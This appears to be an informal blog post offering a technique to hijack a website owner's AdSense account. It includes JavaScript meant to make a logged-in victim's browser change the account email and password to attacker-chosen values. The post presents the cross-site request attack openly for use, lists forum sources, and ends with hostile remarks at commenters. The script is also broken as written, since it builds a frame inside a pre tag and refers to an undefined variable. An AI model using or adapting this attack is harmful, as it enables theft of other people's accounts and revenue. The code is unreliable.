OK.. here's yet another hacking adsense technique…
WARNING: Use at your OWN risk. You'll get BOMBED if you do. So This is a warnign to all those who try it out… DO SO at your own risk.
usecase: You identify some site that has heavy adsense revenues. and you wanna hack the adsense account.
assumptions: The site owner has logged into their adsense account.. and you have "somehow" managed to redirect the site owner to a website of your choice.
here's the scoop: On the "website of your choice"... all you gotto do it.. insert some malicious code… emm.. javascript.. pray that the site owner does not have javascript turned off or blocked... and watch the site owners account turn into yours with some simple javascript code…
so…. here's the code…
<script type="text/javascript" language="JavaScript"> var w = "500" var h = "500" var adsensehack='https://www.google.com/accounts/UpdateEmail?service=adsense&Email=youremail@yourdomain.com&Passwd=adsensehacked&save=' document.write("<pre style='width:" + w + "; height:" + h + ";' "); document.write("align='center' marginwidth='0' marginheight='0' "); document.write("scrolling='no' frameborder='0' id='awglogin' name='awglogin' "); document.write("src='" + s + "'>"); document.write("</pre>"); </script>
SOURCES:
http://sla.ckers.org/forum/read.php?2,10960,11386
http://www.blackhatworld.com/blackhat-seo/black-hat-seo/8801-stealing-adsense-accounts.html
http://topic.csdn.net/u/20070405/12/af7a1eed-9417-421a-a293-277121b10961.html
http://www.cs.ucsd.edu/classes/wi08/cse127/jackson-browsersec.pdf
http://userscripts.org/scripts/review/5406
..... and a whole bunch more.. I just cant remember them…
and for those *** who are reading this... you have the sources this time… you may have all the time in the world to cite sources.. I dont.. I try to.. but sometimes miss out and if I see one more COPY PASTE SPAM comment.. FU !!!
